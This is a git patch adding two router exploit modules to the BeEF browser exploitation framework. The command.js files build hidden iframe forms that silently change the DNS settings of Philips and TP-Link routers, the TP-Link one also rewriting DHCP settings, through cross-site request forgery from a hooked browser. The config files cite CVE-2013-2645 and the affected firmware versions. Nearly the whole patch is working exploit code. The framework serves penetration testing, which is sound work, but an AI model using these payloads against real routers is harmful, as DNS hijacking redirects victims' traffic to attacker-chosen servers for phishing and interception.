From 5b33389746e581a4e2efeb76726059406326830d Mon Sep 17 00:00:00 2001 From: Brendan Coles Date: Sun, 25 Jan 2015 18:53:09 +0000 Subject: [PATCH] Add Philips and TP-Link DNS hijack modules --- .../router/phillips_dns_hijack/command.js | 74 +++++++++++++++++++ .../router/phillips_dns_hijack/config.yaml | 19 +++++ .../router/phillips_dns_hijack/module.rb | 19 +++++ .../router/tplink_dns_csrf/command.js | 67 +++++++++++++++++ .../router/tplink_dns_csrf/config.yaml | 21 ++++++ .../exploits/router/tplink_dns_csrf/module.rb | 20 +++++ 6 files changed, 220 insertions(+) create mode 100644 modules/exploits/router/phillips_dns_hijack/command.js create mode 100644 modules/exploits/router/phillips_dns_hijack/config.yaml create mode 100644 modules/exploits/router/phillips_dns_hijack/module.rb create mode 100644 modules/exploits/router/tplink_dns_csrf/command.js create mode 100644 modules/exploits/router/tplink_dns_csrf/config.yaml create mode 100644 modules/exploits/router/tplink_dns_csrf/module.rb diff --git a/modules/exploits/router/phillips_dns_hijack/command.js b/modules/exploits/router/phillips_dns_hijack/command.js new file mode 100644 index 000000000..7f0b03b13 --- /dev/null +++ b/modules/exploits/router/phillips_dns_hijack/command.js @@ -0,0 +1,74 @@ +// +// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + + // config + var target = 'http://<%= @rhost %>/cgi-bin/setup_dns.exe'; + var dns1 = '<%= @dns1 %>'; + var dns2 = '<%= @dns2 %>'; + var timeout = 15; + + // validate primary DNS server IP address + var parts = dns1.split('.'); + if (parts.length != 4) { + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Primary DNS server IP address was provided"); + return; + } + for (var i=0; i 255) { + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Primary DNS server IP address was provided"); + return; + } + } + var dns1_1 = parts[0]; + var dns1_2 = parts[1]; + var dns1_3 = parts[2]; + var dns1_4 = parts[3]; + + // validate secondary DNS server IP address + var parts = dns2.split('.'); + if (parts.length != 4) { + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Secondary DNS server IP address was provided"); + return; + } + for (var i=0; i 255) { + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Secondary DNS server IP address was provided"); + return; + } + } + var dns2_1 = parts[0]; + var dns2_2 = parts[1]; + var dns2_3 = parts[2]; + var dns2_4 = parts[3]; + + // change DNS + var philips_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(target, "GET", "application/x-www-form-urlencoded", [ + {'type':'hidden', 'name':'page', 'value':'setup_dns'}, + {'type':'hidden', 'name':'logout', 'value':''}, + {'type':'hidden', 'name':'dns1_1', 'value':dns1_1}, + {'type':'hidden', 'name':'dns1_2', 'value':dns1_2}, + {'type':'hidden', 'name':'dns1_3', 'value':dns1_3}, + {'type':'hidden', 'name':'dns1_4', 'value':dns1_4}, + {'type':'hidden', 'name':'dns2_1', 'value':dns2_1}, + {'type':'hidden', 'name':'dns2_2', 'value':dns2_2}, + {'type':'hidden', 'name':'dns2_3', 'value':dns2_3}, + {'type':'hidden', 'name':'dns2_4', 'value':dns2_4} + ]); + + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); + + // clean up + cleanup = function() { + document.body.removeChild(philips_iframe_<%= @command_id %>); + } + setTimeout("cleanup()", timeout*1000); + +}); + diff --git a/modules/exploits/router/phillips_dns_hijack/config.yaml b/modules/exploits/router/phillips_dns_hijack/config.yaml new file mode 100644 index 000000000..e3c79effb --- /dev/null +++ b/modules/exploits/router/phillips_dns_hijack/config.yaml @@ -0,0 +1,19 @@ +# +# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +# References: +# https://bugzilla.mozilla.org/show_bug.cgi?id=371598 +# http://www.gnucitizen.org/blog/router-hacking-challenge/ +# +beef: + module: + philips_dns_hijack: + enable: true + category: ["Exploits", "Router"] + name: "Philips DNS Hijack" + description: "Attempts to change the DNS setting on a Philips router.

Philips routers reportedly do not require authentication to change the DNS servers.

This module has not been tested." + authors: ["bob"] + target: + unknown: ["ALL"] diff --git a/modules/exploits/router/phillips_dns_hijack/module.rb b/modules/exploits/router/phillips_dns_hijack/module.rb new file mode 100644 index 000000000..3ac085eec --- /dev/null +++ b/modules/exploits/router/phillips_dns_hijack/module.rb @@ -0,0 +1,19 @@ +# +# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +class Philips_dns_hijack < BeEF::Core::Command + + def self.options + return [ + {'name' => 'rhost', 'ui_label' => 'Remote Host', 'value' => '192.168.1.1'}, + {'name' => 'dns1', 'ui_label' => 'Primary DNS Server', 'value' => '8.8.8.8'}, + {'name' => 'dns2', 'ui_label' => 'Secondary DNS Server', 'value' => '8.8.4.4'} + ] + end + + def post_execute + save({'result' => @datastore['result']}) + end + +end diff --git a/modules/exploits/router/tplink_dns_csrf/command.js b/modules/exploits/router/tplink_dns_csrf/command.js new file mode 100644 index 000000000..18727881e --- /dev/null +++ b/modules/exploits/router/tplink_dns_csrf/command.js @@ -0,0 +1,67 @@ +// +// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + + // config + var dhcp_start = '192.168.1.100'; + var dhcp_end = '192.168.1.199'; + var target = 'http://<%= @rhost %>/userRpm/LanDhcpServerRpm.htm'; + var dns1 = '<%= @dns1 %>'; + var dns2 = '<%= @dns2 %>'; + var timeout = 15; + + // validate primary DNS server IP address + var parts = dns1.split('.'); + if (parts.length != 4) { + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Primary DNS server IP address was provided"); + return; + } + for (var i=0; i 255) { + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Primary DNS server IP address was provided"); + return; + } + } + + // validate secondary DNS server IP address + var parts = dns2.split('.'); + if (parts.length != 4) { + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Secondary DNS server IP address was provided"); + return; + } + for (var i=0; i 255) { + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Secondary DNS server IP address was provided"); + return; + } + } + + // change DNS + var tplink_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(target, "GET", "application/x-www-form-urlencoded", [ + {'type':'hidden', 'name':'dhcpserver', 'value':'1'}, + {'type':'hidden', 'name':'ip1', 'value':dhcp_start}, + {'type':'hidden', 'name':'ip2', 'value':dhcp_end}, + {'type':'hidden', 'name':'Lease', 'value':'120'}, + {'type':'hidden', 'name':'gateway', 'value':'0.0.0.0'}, + {'type':'hidden', 'name':'domain', 'value':''}, + {'type':'hidden', 'name':'dnsserver', 'value':dns1}, + {'type':'hidden', 'name':'dnsserver2', 'value':dns2}, + {'type':'hidden', 'name':'Save', 'value': unescape('%B1%A3+%B4%E6')} + ]); + + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); + + // clean up + cleanup = function() { + document.body.removeChild(tplink_iframe_<%= @command_id %>); + } + setTimeout("cleanup()", timeout*1000); + +}); + diff --git a/modules/exploits/router/tplink_dns_csrf/config.yaml b/modules/exploits/router/tplink_dns_csrf/config.yaml new file mode 100644 index 000000000..6c08dfae1 --- /dev/null +++ b/modules/exploits/router/tplink_dns_csrf/config.yaml @@ -0,0 +1,21 @@ +# +# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +# References: +# CVE-2013-2645 +# http://securityevaluators.com/knowledge/case_studies/routers/tp-link_wr1043n.php +# http://www.jakoblell.com/blog/2013/10/30/real-world-csrf-attack-hijacks-dns-server-configuration-of-tp-link-routers-2/ +# http://news.softpedia.com/news/Cybercriminals-Exploit-TP-Link-Router-CSRF-Vulnerabilities-to-Hijack-DNS-Settings-395545.shtml +# +beef: + module: + tplink_dns_csrf: + enable: true + category: ["Exploits", "Router"] + name: "TP-Link DNS Hijack CSRF" + description: "Attempts to change the DNS setting on a TP-Link router (WR1043ND, TL-MR3020, TL-WDR3600).

The browser must be have an authenticated session on the router.

The list of affected devices includes:
TP-Link WR1043ND V1 up to firmware version 3.3.12 build 120405
TP-Link TL-MR3020 firmware version 3.14.2 Build 120817 Rel.55520n and version 3.15.2 Build 130326 Rel.58517n
TL-WDR3600 firmware version 3.13.26 Build 130129 Rel.59449n and version 3.13.31 Build 130320 Rel.55761n.

This module has not been tested." + authors: ["Jakob Lell", "Jacob Holcomb"] + target: + unknown: ["ALL"] diff --git a/modules/exploits/router/tplink_dns_csrf/module.rb b/modules/exploits/router/tplink_dns_csrf/module.rb new file mode 100644 index 000000000..a8c44534f --- /dev/null +++ b/modules/exploits/router/tplink_dns_csrf/module.rb @@ -0,0 +1,20 @@ +# +# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Tplink_dns_csrf < BeEF::Core::Command + + def self.options + return [ + {'name' => 'rhost', 'ui_label' => 'Remote Host', 'value' => '192.168.1.1'}, + {'name' => 'dns1', 'ui_label' => 'Primary DNS Server', 'value' => '8.8.8.8'}, + {'name' => 'dns2', 'ui_label' => 'Secondary DNS Server', 'value' => '8.8.4.4'} + ] + end + + def post_execute + save({'result' => @datastore['result']}) + end + +end